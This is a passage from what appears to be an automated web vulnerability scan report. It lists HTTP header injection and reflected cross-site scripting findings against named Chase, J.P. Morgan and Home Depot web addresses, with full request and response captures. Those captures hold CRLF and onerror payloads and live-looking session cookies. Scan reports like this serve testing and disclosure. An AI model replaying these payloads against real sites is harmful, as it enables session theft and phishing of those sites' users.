Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316?AQB=1&vvpr=true&&ndh=1&t=12%2F6%2F2011%2012%3A59%3A8%202%20300&pageName=itunes%20-%20index%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.itunes&c1=music%20-%20sep%202010%20(us)&c4=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&c5=win32&c6=D%3D%22%3A%20%22%2BpageName&c9=windows&c12=no%20itunes&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c25=other%20nav%20or%20none&c44=appleglobal%2Cappleitunes%2Cappleusitunesipod&c48=1&c49=D%3Ds_vi&c50=itunes%3D3&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=823&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1d4dd7
1d25cb0b3ad
&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1310493572:
Date: Tue, 12 Jul 2011 17:59:32 GMT
Server: GFE/2.0
Content-Type: text/html


2.3. https://locator.chase.com/LocatorAction.do [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://locator.chase.com
Path:   /LocatorAction.do

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22ef1%0d%0a7769e8f9510 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22ef1%0d%0a7769e8f9510;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 12 Jul 2011 16:09:43 GMT
Server: Apache
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: /22ef1
7769e8f9510
;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


2.4. https://locator.chase.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://locator.chase.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7b17c%0d%0ac7e1c72fd84 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7b17c%0d%0ac7e1c72fd84 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8EEB941FE1274DFCE21BE8CFDBAF22F9.ftc-web1

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 12 Jul 2011 16:09:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=3E400342F5CBBAA525EA57380B24E1E9.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: /7b17c
c7e1c72fd84
;jsessionid=3E400342F5CBBAA525EA57380B24E1E9.ftc-web3
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


2.5. https://locator.chase.com/jsp/SearchPage.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://locator.chase.com
Path:   /jsp/SearchPage.jsp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 64242%0d%0a98bbc6ba98b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /64242%0d%0a98bbc6ba98b/SearchPage.jsp HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=23ECC4A4BD991387CE19963C8C5BA577.ftc-web4

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 12 Jul 2011 16:10:31 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD669E70F19B7B9016BF9ACB421F449B.ftc-web4; Path=/; Secure
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: /64242
98bbc6ba98b
/SearchPage.jsp;jsessionid=BD669E70F19B7B9016BF9ACB421F449B.ftc-web4
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


3. Cross-site scripting (reflected)  previous  next
There are 36 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://access.jpmorgan.com
Path:   /appmanager/jpmalogonportal/jpmalogonhome

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1ad44(a)706815c84f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appmanager/jpmalogonportal1ad44(a)706815c84f/jpmalogonhome?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome&brand=jpma HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma

Response

HTTP/1.1 404 Not Found
Date: Tue, 12 Jul 2011 16:31:12 GMT
Server: Apache
Content-Length: 96
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Resource /jpmalogonportal1ad44(a)706815c84f/jpmalogonhome could not be resolved for locale null.

3.2. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://access.jpmorgan.com
Path:   /appmanager/jpmalogonportal/jpmalogonhome

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9fa1a(a)6d1551bfcb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appmanager/jpmalogonportal/jpmalogonhome9fa1a(a)6d1551bfcb1?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome&brand=jpma HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma

Response

HTTP/1.1 404 Not Found
Date: Tue, 12 Jul 2011 16:31:18 GMT
Server: Apache
Content-Length: 97
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Resource /jpmalogonportal/jpmalogonhome9fa1a(a)6d1551bfcb1 could not be resolved for locale null.

3.3. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [TARGET parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://access.jpmorgan.com
Path:   /appmanager/jpmalogonportal/jpmalogonhome

Issue detail

The value of the TARGET request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f722"%20a%3db%20200316abca was submitted in the TARGET parameter. This input was echoed as 9f722" a=b 200316abca in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /appmanager/jpmalogonportal/jpmalogonhome?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome9f722"%20a%3db%20200316abca&brand=jpma HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:31:00 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome9f722" a=b 200316abca; domain=.jpmorgan.com; path=/; secure
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 34403


<html>


   <head>


<title>J.P. Morgan ACCESS</title><link rel="stylesheet" href="/framework/skins/jpmaskin/r3/css/jpmalogon.css" type="text/css"><link type="image/x-icon" rel="shortcut ic
...[SNIP]...
<input type="hidden" name="target" value="https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome9f722" a=b 200316abca"/>
...[SNIP]...

3.4. http://community.homedepot.com/restapi/vc/boards/id/Maintenance [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.homedepot.com
Path:   /restapi/vc/boards/id/Maintenance

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e6afc<img%20src%3da%20onerror%3dalert(1)>81e5cad2eb0 was submitted in the callback parameter. This input was echoed as e6afc<img src=a onerror=alert(1)>81e5cad2eb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/Maintenance?xslt=json.xsl&callback=jsonp1310488529624e6afc<img%20src%3da%20onerror%3dalert(1)>81e5cad2eb0 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 653
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp1310488529624e6afc<img src=a onerror=alert(1)>81e5cad2eb0({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/Maintenance","id":{"type":"string","$":"Maintenance"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"s
...[SNIP]...

3.5. http://community.homedepot.com/restapi/vc/boards/id/build [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.homedepot.com
Path:   /restapi/vc/boards/id/build

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8d1a9<img%20src%3da%20onerror%3dalert(1)>02e074b4b25 was submitted in the callback parameter. This input was echoed as 8d1a9<img src=a onerror=alert(1)>02e074b4b25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/build?xslt=json.xsl&callback=jsonp13104885296198d1a9<img%20src%3da%20onerror%3dalert(1)>02e074b4b25 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 600
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp13104885296198d1a9<img src=a onerror=alert(1)>02e074b4b25({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/build","id":{"type":"string","$":"build"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"string","$":"
...[SNIP]...

3.6. http://community.homedepot.com/restapi/vc/boards/id/lawns [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.homedepot.com
Path:   /restapi/vc/boards/id/lawns

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 1e87e<img%20src%3da%20onerror%3dalert(1)>eba813800c3 was submitted in the callback parameter. This input was echoed as 1e87e<img src=a onerror=alert(1)>eba813800c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/lawns?xslt=json.xsl&callback=jsonp13104885296211e87e<img%20src%3da%20onerror%3dalert(1)>eba813800c3 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:34 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 637
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp13104885296211e87e<img src=a onerror=alert(1)>eba813800c3({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/lawns","id":{"type":"string","$":"lawns"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"string","$":"
...[SNIP]...

3.7. http://community.homedepot.com/restapi/vc/boards/id/replace [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.homedepot.com
Path:   /restapi/vc/boards/id/replace

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f5c71<img%20src%3da%20onerror%3dalert(1)>070705f0df3 was submitted in the callback parameter. This input was echoed as f5c71<img src=a onerror=alert(1)>070705f0df3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

